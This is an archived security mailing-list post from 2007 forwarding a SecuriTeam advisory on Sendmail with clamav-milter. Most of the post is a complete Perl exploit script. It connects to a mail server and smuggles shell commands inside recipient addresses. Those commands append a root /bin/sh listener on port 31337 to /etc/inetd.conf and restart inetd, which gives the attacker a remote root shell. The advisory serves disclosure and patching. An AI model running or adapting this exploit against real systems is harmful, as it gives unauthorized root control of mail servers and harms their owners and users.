ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [EXPL] Clamav-milter and Sendmail Allow Arbitrary Command Execution (Exploit)



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Sunday, December 23, 2007 11:52 AM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [EXPL] Clamav-milter and Sendmail Allow Arbitrary
> Command Execution (Exploit)
>
> Clamav-milter and Sendmail Allow Arbitrary Command Execution
> (Exploit)
>
>
>
> A vulnerability in clamav-milter when associated with
> Sendmail allows remote attackers to cause the product to
> execute arbitrary code.
>
>
> Exploit:
> ### black-hole.pl
> ### Sendmail w/ clamav-milter Remote Root Exploit
> ### Copyright (c) 2007 Eliteboy
> ########################################################
> use IO::Socket;
>
> print "Sendmail w/ clamav-milter Remote Root Exploit\n";
> print "Copyright (C) 2007 Eliteboy\n";
>
> if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}
>
> print "Attacking $ARGV[0]...\n";
>
> $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
>                               PeerPort => '25',
>                               Proto => 'tcp');
>
> print $sock "ehlo you\r\n";
> print $sock "mail from: <>\r\n";
> print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp
> nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
> print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd
> restart\"@localhost>\r\n";
> print $sock "data\r\n.\r\nquit\r\n";
>
> while (<$sock>) {
>         print;
> }
>
> # milw0rm.com [2007-12-21]
>
>
> Additional Information:
> The information has been provided by Eliteboy.
> The original article can be found at:
> http://www.milw0rm.com/exploits/4761
>
>



 




Copyright © Lexa Software, 1996-2009.